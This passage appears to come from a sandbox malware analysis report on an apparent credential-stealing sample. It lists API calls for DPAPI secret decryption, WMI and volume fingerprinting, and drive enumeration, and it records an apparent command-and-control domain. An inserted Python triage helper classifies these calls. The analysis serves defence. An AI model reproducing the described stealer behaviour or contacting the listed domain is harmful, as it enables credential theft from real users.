                                                                                                                    • Part of subcall function 00DA60D4: CloseHandle.KERNEL32(FFFFFFFE,00DA6093,?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000,?,?), ref: 00DA60E4
                                                                                                                  • ___initconout.LIBCMT ref: 00DA6093
                                                                                                                    • Part of subcall function 00DA60B5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DA6051,00DA553C,?,?,00D9F6FB,?,00000000,00000000,?), ref: 00DA60C8
                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000,?), ref: 00DA60A8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2744216297-0
                                                                                                                  • Opcode ID: ff87bc1180fd93343d2c024f373391b42f2dbd77685d9fb7efde3242f948296e
                                                                                                                  • Instruction ID: d1482df3acc6bb2ec2d125b974bf6961d6c52d8d355d204a39f084ecc8380053
                                                                                                                  • Opcode Fuzzy Hash: ff87bc1180fd93343d2c024f373391b42f2dbd77685d9fb7efde3242f948296e
                                                                                                                  • Instruction Fuzzy Hash: E0F03736401224FBCF222F91DC0999A3F65FB453A0F088110FA19D5270CB31C960ABB5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcspn
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 3709121408-2766056989
                                                                                                                  • Opcode ID: a546db021739ce0d8ebc9515ffc76dc2eb24b43d1314184c01583daac12d15b8
                                                                                                                  • Instruction ID: f18b8f625ecda85b3788d69dc424d342c52059ea92747f7d63b77b58885694d4
                                                                                                                  • Opcode Fuzzy Hash: a546db021739ce0d8ebc9515ffc76dc2eb24b43d1314184c01583daac12d15b8
                                                                                                                  • Instruction Fuzzy Hash: 7432C5B4904269CFCB14EF64C981AADFBF1BF48310F15859AE849A7351D730AE85CFA1
                                                                                                                  APIs
                                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D96CFF,?,?,00000000,00000000,00000000,?), ref: 00D96E23
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EncodePointer
                                                                                                                  • String ID: MOC$RCC
                                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                                  • Opcode ID: 28e40cc98cb5eed2f3d0332c11aef93917444f20cee66628853a153108bc5af1
                                                                                                                  • Instruction ID: 732b35ea4839a1986fab29ed6cbd1ca2de4d4a310616efba67207408725eddbe
                                                                                                                  • Opcode Fuzzy Hash: 28e40cc98cb5eed2f3d0332c11aef93917444f20cee66628853a153108bc5af1
                                                                                                                  • Instruction Fuzzy Hash: 5D412672900209EFCF16DF98D981AAEBBB5FF48304F198199FA04A7221D335E950DB70
                                                                                                                  APIs
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D968E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ___except_validate_context_record
                                                                                                                  • String ID: csm$csm
                                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                                  • Opcode ID: aaf8f6f65dfbfe904336524272207b742f04c9cfde56eb61897fb40169e59a3c
                                                                                                                  • Instruction ID: e6d5fdfc286cd8ef581cfc420e46366b103a9c4accd5b8f2eff10e453ec4eb2c
                                                                                                                  • Opcode Fuzzy Hash: aaf8f6f65dfbfe904336524272207b742f04c9cfde56eb61897fb40169e59a3c
                                                                                                                  • Instruction Fuzzy Hash: 3531C432400219FBCF269F54CD44A6A7B66FF09315B1C826AF9944A121D332DCA1DFB1

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage: 5%
                                                                                                                  Dynamic/Decrypted Code Coverage: 0%
                                                                                                                  Signature Coverage: 35.5%
                                                                                                                  Total number of Nodes: 234
                                                                                                                  Total number of Limit Nodes: 17

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                   APIs
                                                                                                                   • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 00435B59 (rclsid and riid are read from 0x43F68C and 0x43F67C, which the report does not resolve to GUIDs; dwClsContext=1 is CLSCTX_INPROC_SERVER)
                                                                                                                   • SysAllocString.OLEAUT32(C173DF3B), ref: 00435BC1
                                                                                                                   • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00435BFE (dwAuthnSvc=0xA RPC_C_AUTHN_WINNT, dwAuthzSvc=RPC_C_AUTHZ_NONE, dwAuthnLevel=3 RPC_C_AUTHN_LEVEL_CALL, dwImpLevel=3 RPC_C_IMP_LEVEL_IMPERSONATE: the standard proxy security settings of a WMI client, applied to the object created above before the BSTRs from the three SysAllocString calls are handed to it)
                                                                                                                   • SysAllocString.OLEAUT32(C826F622), ref: 00435C51
                                                                                                                   • SysAllocString.OLEAUT32(A466A272), ref: 00435CF5
                                                                                                                   • VariantInit.OLEAUT32(CECDCCF3), ref: 00435D60
                                                                                                                   • VariantClear.OLEAUT32(CECDCCF3), ref: 00435EA3
                                                                                                                   • SysFreeString.OLEAUT32(?), ref: 00435EC7
                                                                                                                   • SysFreeString.OLEAUT32(?), ref: 00435ECD
                                                                                                                   • SysFreeString.OLEAUT32(00000000), ref: 00435EDE
                                                                                                                   • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,C173DF3B,00000000,00000000,00000000,00000000), ref: 00435F0E (all output buffers except the 4th parameter, lpVolumeSerialNumber, are NULL, the call shape used to read only the volume serial number)
                                                                                                                   • Note: the argument columns are the sandbox's static reconstruction and may hold stale register or stack contents. 0xC173DF3B and 0xCECDCCF3 are not valid 32-bit user-mode pointers, so the SysAllocString/VariantInit operands and the 4th GetVolumeInformationW argument should be confirmed in a debugger rather than taken at face value.
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                  • String ID: ,-./$EP$QR$@dy
                                                                                                                  • API String ID: 2573436264-442951764
                                                                                                                  • Opcode ID: 70ec9ae03888c60de39039395fe5beec92ddb2858c77087bc173a14fb67959b0
                                                                                                                  • Instruction ID: 29926613f5cf6e48166075966a574d9e19e78f2bdd3ed2d624ba22a0fdd574ce
                                                                                                                  • Opcode Fuzzy Hash: 70ec9ae03888c60de39039395fe5beec92ddb2858c77087bc173a14fb67959b0
                                                                                                                  • Instruction Fuzzy Hash: 5722FE726183409FD710CF28C881B9BBBE6EBC9704F14892DF591DB2A1D778D9098B96

                                                                                                                   • Control-flow graph (edge list omitted): function at 0x4228A8, blocks 0x4228A8-0x422F84. GetLogicalDrives is called from block 0x422A47-0x422A67; internal calls go to 0x408040, 0x408030, 0x420680, 0x420230 and 0x43C070.
                                                                                                                   APIs
                                                                                                                   • GetLogicalDrives.KERNEL32 (call site inside block 0x422A47-0x422A67 according to the control-flow graph; the report records no ref address for it)
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DrivesLogical
                                                                                                                  • String ID: 7.l$7.l$RT$^!P
                                                                                                                  • API String ID: 999431828-3477192934
                                                                                                                  • Opcode ID: 5d787efca701a18f52e87d36dda2b2bdcbeb7538f9fd1822f6bab23becfd1a80
                                                                                                                  • Instruction ID: 15f22e5365e44fac4e8dd0b875b66722e8f94ddaf6c00cd4c3737f2dc822db09
                                                                                                                  • Opcode Fuzzy Hash: 5d787efca701a18f52e87d36dda2b2bdcbeb7538f9fd1822f6bab23becfd1a80
                                                                                                                  • Instruction Fuzzy Hash: A5F10DB06183409FD710DF55D98126BBBF0FB86304F54896DE899AB366C378C906CB8A

                                                                                                                   • Control-flow graph (edge list omitted): function at 0x418A48, blocks 0x4188FF-0x418DF5. CryptUnprotectData is called from block 0x418CD2-0x418CFC; internal calls go to 0x43B800, 0x408040, 0x401DB0, 0x41C9A0, 0x408030 and 0x408C60.
                                                                                                                  APIs
                                                                                                                   • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00418CEC (ppszDataDescr, pOptionalEntropy, pvReserved and pPromptStruct are NULL and dwFlags=0: a plain user-scope DPAPI unwrap in the victim's own logon session, which is exactly what is needed to decrypt secrets an application protected with CryptProtectData and no additional entropy)
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                  • String ID: <7+0$B$P^$\
                                                                                                                  • API String ID: 834300711-3035337080
                                                                                                                  • Opcode ID: bdeea8c14914bec16e16bea6ab82c1f90df1e7dfe7fce7e43c57d33763c95337
                                                                                                                  • Instruction ID: 9117f44ace41229e70de94badf4a8ca47e8b9aef6a674a708b7d3d64af525580
                                                                                                                  • Opcode Fuzzy Hash: bdeea8c14914bec16e16bea6ab82c1f90df1e7dfe7fce7e43c57d33763c95337
                                                                                                                  • Instruction Fuzzy Hash: F2C124B6A083418FD724CF24C89579FB7E1EF95304F09492EE48997391EB389845CB46

                                                                                                                   • Control-flow graph (edge list omitted): function at 0x408870, blocks 0x408870-0x4089D4. GetCurrentProcessId and GetCurrentThreadId are in block 0x408894-0x4088B7, SHGetSpecialFolderPathW and GetForegroundWindow in 0x4088BD-0x40890C, ExitProcess in 0x4089D2-0x4089D4; internal calls go to 0x439850, 0x433180, 0x439D70, 0x409A30, 0x40C900 and 0x40B400.
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00408894
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040889D
                                                                                                                   • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004088EF (hwnd=NULL, csidl=0x10 CSIDL_DESKTOPDIRECTORY, fCreate=FALSE: resolves the current user's Desktop folder path)
                                                                                                                  • GetForegroundWindow.USER32 ref: 00408904
                                                                                                                  • ExitProcess.KERNEL32 ref: 004089D4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4063528623-0
                                                                                                                  • Opcode ID: 43df9f6dec1794d0aecb39decac8833d665b09034ebe72d3b5c0dd88d144fadc
                                                                                                                  • Instruction ID: 2fdc60a93d28710b0cd175d4a777b9100b7534f652ffd6ab37f8d50b1fae6fcb
                                                                                                                  • Opcode Fuzzy Hash: 43df9f6dec1794d0aecb39decac8833d665b09034ebe72d3b5c0dd88d144fadc
                                                                                                                  • Instruction Fuzzy Hash: 78310873E0071817C3143AB99C4A369B59A9BC0724F1F513FAE86AB3D2EDBD8C0545C9

                                                                                                                   • Control-flow graph (edge list omitted): function at 0x42B0E3, blocks 0x42B0E3-0x42BB22. FreeLibrary and the first GetComputerNameExA call are in block 0x42B1DB-0x42B66B, a second GetComputerNameExA call sits in block 0x42B70B-0x42B746 (only the first appears in the API list below); internal calls go to 0x43B800 and 0x42E990.
                                                                                                                  APIs
                                                                                                                   • FreeLibrary.KERNEL32(?), ref: 0042B1E3
                                                                                                                   • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042B650 (NameType=6 is ComputerNamePhysicalDnsDomain, so this call collects the machine's DNS domain; the control-flow graph shows a second GetComputerNameExA call in block 0x42B70B whose NameType the report does not record)
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ComputerFreeLibraryName
                                                                                                                  • String ID: 74;2
                                                                                                                  • API String ID: 2904949787-2613046512
                                                                                                                  • Opcode ID: 0e377140fcb1c585446d757eaf89cd8bd9efaf1d8ba53a5f0c1aade27a5f2094
                                                                                                                  • Instruction ID: c9dd994f55d1cf543acc5411ab0634e220a0874542a1252c8c9bd8573c59c7b1
                                                                                                                  • Opcode Fuzzy Hash: 0e377140fcb1c585446d757eaf89cd8bd9efaf1d8ba53a5f0c1aade27a5f2094
                                                                                                                  • Instruction Fuzzy Hash: 9C0237712057918FD7258F39C890762BBE2EF96300F1D859EC4D68B793C779A842CBA4
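The API lists above are only useful once the raw argument values are decoded (RPC_C_AUTHN_WINNT for CoSetProxyBlanket, ComputerNamePhysicalDnsDomain for GetComputerNameExA, CSIDL_DESKTOPDIRECTORY for SHGetSpecialFolderPathW) and the per-function API sets are mapped to what the sample can do. The following is an added triage helper, not part of this report or of Joe Sandbox. It parses entries in the report's `Name.Module(args), ref: addr` shape (prefixed here with a `fn_<addr>|` tag that is this example's own convention), decodes the constants from the Windows SDK headers, and labels each function with a capability. The sample entries are copied from this page; the capability mapping and the unresolved `?` handling are assumptions of the example, not sandbox signatures.

```python
"""Triage helper for Joe Sandbox "APIs" entries (added example)."""
import re
from collections import defaultdict

# Entries copied from this report, prefixed with the function's start address.
# GetLogicalDrives has no ref in the report; the address used here is the start
# of the control-flow-graph block it is called from.
SAMPLE = """\
fn_435880|CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 00435B59
fn_435880|CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00435BFE
fn_435880|GetVolumeInformationW.KERNELBASE(?,00000000,00000000,C173DF3B,00000000,00000000,00000000,00000000), ref: 00435F0E
fn_4228a8|GetLogicalDrives.KERNEL32 ref: 00422A47
fn_418a48|CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00418CEC
fn_408870|SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004088EF
fn_42b0e3|GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042B650
"""

# "<fn>|Name.Module(args), ref: addr"; the parens and the comma are optional
# because the report omits both for APIs that take no arguments.
LINE = re.compile(r"^(?P<fn>[^|]+)\|(?P<api>\w+)\.(?P<mod>\w+)"
                  r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")

# Windows SDK constants (rpcdce.h, winbase.h, shlobj.h, wtypesbase.h).
COMPUTER_NAME_FORMAT = {
    0: "ComputerNameNetBIOS", 1: "ComputerNameDnsHostname",
    2: "ComputerNameDnsDomain", 3: "ComputerNameDnsFullyQualified",
    4: "ComputerNamePhysicalNetBIOS", 5: "ComputerNamePhysicalDnsHostname",
    6: "ComputerNamePhysicalDnsDomain", 7: "ComputerNamePhysicalDnsFullyQualified"}
RPC_C_AUTHN = {9: "RPC_C_AUTHN_GSS_NEGOTIATE", 10: "RPC_C_AUTHN_WINNT",
               0xFFFFFFFF: "RPC_C_AUTHN_DEFAULT"}
RPC_C_AUTHN_LEVEL = {0: "DEFAULT", 1: "NONE", 2: "CONNECT", 3: "CALL",
                     4: "PKT", 5: "PKT_INTEGRITY", 6: "PKT_PRIVACY"}
RPC_C_IMP_LEVEL = {0: "DEFAULT", 1: "ANONYMOUS", 2: "IDENTIFY",
                   3: "IMPERSONATE", 4: "DELEGATE"}
CSIDL = {0x05: "CSIDL_PERSONAL", 0x10: "CSIDL_DESKTOPDIRECTORY",
         0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA"}
CLSCTX = {1: "CLSCTX_INPROC_SERVER", 4: "CLSCTX_LOCAL_SERVER"}

# This example's own mapping from API sets to stealer capabilities.
CAPABILITIES = {
    "DPAPI unwrap of stored secrets": {"CryptUnprotectData"},
    "WMI/COM client setup": {"CoCreateInstance", "CoSetProxyBlanket"},
    "volume serial fingerprint": {"GetVolumeInformationW"},
    "host/domain name fingerprint": {"GetComputerNameExA"},
    "drive enumeration": {"GetLogicalDrives"},
    "user profile folder lookup": {"SHGetSpecialFolderPathW"},
}


def parse_args(raw):
    """'?' marks a value the sandbox could not reconstruct; keep it as None."""
    if not raw:
        return []
    return [None if a == "?" else int(a, 16) for a in raw.split(",")]


def decode(api, args):
    """Human-readable notes for the constants this example knows about."""
    def arg(i):
        return args[i] if i < len(args) else None
    notes = []
    if api == "CoSetProxyBlanket" and len(args) >= 6:
        notes.append("authn=%s authn_level=%s imp_level=%s" % (
            RPC_C_AUTHN.get(arg(1), arg(1)), RPC_C_AUTHN_LEVEL.get(arg(4), arg(4)),
            RPC_C_IMP_LEVEL.get(arg(5), arg(5))))
    elif api == "CoCreateInstance" and arg(2) is not None:
        notes.append("clsctx=%s" % CLSCTX.get(arg(2), hex(arg(2))))
    elif api == "GetComputerNameExA" and arg(0) is not None:
        notes.append("NameType=%s" % COMPUTER_NAME_FORMAT.get(arg(0), arg(0)))
    elif api == "SHGetSpecialFolderPathW" and arg(2) is not None:
        notes.append("csidl=%s" % CSIDL.get(arg(2), hex(arg(2))))
    elif api == "CryptUnprotectData" and len(args) == 7 and arg(2) == 0:
        notes.append("pOptionalEntropy=NULL")
    elif api == "GetVolumeInformationW" and len(args) == 8:
        # Only the 4th out-parameter (lpVolumeSerialNumber) is non-NULL.
        if arg(3) and all(arg(i) == 0 for i in (1, 2, 4, 5, 6, 7)):
            notes.append("only lpVolumeSerialNumber requested")
    return notes


def triage(text):
    """Group entries per function; attach decoded notes and capability labels."""
    per_fn = defaultdict(list)
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # headings and unparseable lines are skipped
        args = parse_args(m["args"])
        per_fn[m["fn"]].append({"api": m["api"], "module": m["mod"],
                                "ref": int(m["ref"], 16), "args": args,
                                "notes": decode(m["api"], args)})
    report = {}
    for fn, calls in per_fn.items():
        apis = {c["api"] for c in calls}
        caps = sorted(n for n, need in CAPABILITIES.items() if need <= apis)
        report[fn] = {"calls": calls, "capabilities": caps}
    return report


if __name__ == "__main__":
    for fn, info in triage(SAMPLE).items():
        print(fn, info["capabilities"])
        for c in info["calls"]:
            print("   %08X %s.%s %s" % (c["ref"], c["api"], c["module"],
                                         "; ".join(c["notes"])))
```

The decoder deliberately keeps unresolved `?` arguments as None and only emits a note when the relevant slot is present, since the report's argument columns are a static reconstruction that can be wrong; extend CAPABILITIES with the API sets of the sample you are looking at rather than treating the six labels here as exhaustive.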

                                                                                                                   • Control-flow graph (edge list omitted): function at 0x40C97B, blocks 0x40C97B-0x40CE11. Internal calls go to 0x408710, 0x435880 (the COM/GetVolumeInformationW routine at 0x435880 above) and 0x40B430; the two string references listed below fall in the same blocks (0x40C9C9 in block 0x40C9B7-0x40C9F4, 0x40CDE1 in block 0x40CDB8-0x40CDE6).
                                                                                                                  Strings
                                                                                                                  • tacitglibbr.biz, xrefs: 0040CDE1
                                                                                                                  • 88FE57294B3FC45EE430B6CE554835A9, xrefs: 0040C9C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 88FE57294B3FC45EE430B6CE554835A9$tacitglibbr.biz
                                                                                                                  • API String ID: 0-4267815069
                                                                                                                  • Opcode ID: 483499d02bbe12feb61667cde9647466b7d832abe09e5f14a4e1c7d524797fa7
                                                                                                                  • Instruction ID: bbf81f0760fca7c08bc221ef1c3e51b8340ee4abbe1fbc1be906c63b7a9b9e55
                                                                                                                  • Opcode Fuzzy Hash: 483499d02bbe12feb61667cde9647466b7d832abe09e5f14a4e1c7d524797fa7
                                                                                                                  • Instruction Fuzzy Hash: 14B102B564D3908BD338CF24D4917EFBBE1ABD6300F18896EC4DA6B391D77848058B86
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: 6543$@
                                                                                                                  • API String ID: 2994545307-3564168940
                                                                                                                  • Opcode ID: d0334cf39d2bdf1043e93597f5300b02dbb4d2223a31d5ed95101b081ea64827
                                                                                                                  • Instruction ID: 5cf5a725ecd8c7379691a97a9daa1d9505c43bf6e4ed69b2554d4391442ca438
                                                                                                                  • Opcode Fuzzy Hash: d0334cf39d2bdf1043e93597f5300b02dbb4d2223a31d5ed95101b081ea64827
                                                                                                                  • Instruction Fuzzy Hash: 4F4149B16042018BDB18CF24C89577B77F5FF99318F14952ED486AB392E739D908CB86
                                                                                                                  APIs
                                                                                                                  • LdrInitializeThunk.NTDLL(0043BEAB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E1E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 7(
                                                                                                                  • API String ID: 0-3832224305
                                                                                                                  • Opcode ID: 68b2afe561c01ee91116204d12b0dfa01caa74b8d1c2de12960563918693ffee
                                                                                                                  • Instruction ID: 3b7bb95ef2d2f74051047dfb603a013a75dc9fc2134849f86c35aa37d8f9a990
                                                                                                                  • Opcode Fuzzy Hash: 68b2afe561c01ee91116204d12b0dfa01caa74b8d1c2de12960563918693ffee
                                                                                                                  • Instruction Fuzzy Hash: CB51BCB7EA83584BC3208FD49CC0773B6A2E7D6300F19842CDAC02B755E9B59D069BC6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: a204f27aaeac8ada477e8f3fb69e99628460e46cea5074a9c6f9414710ce2bad
                                                                                                                  • Instruction ID: 234686714594285b1e20d19de97384e69317631695e650a40d04bd971bcbfc65
                                                                                                                  • Opcode Fuzzy Hash: a204f27aaeac8ada477e8f3fb69e99628460e46cea5074a9c6f9414710ce2bad
                                                                                                                  • Instruction Fuzzy Hash: 05714FB5B447209BD714AB25EC9273F73A5DFC1314F98843EE9829B382E67C9C05835A

                                                                                                                   Control-flow Graph (legend: Executed / Not Executed)
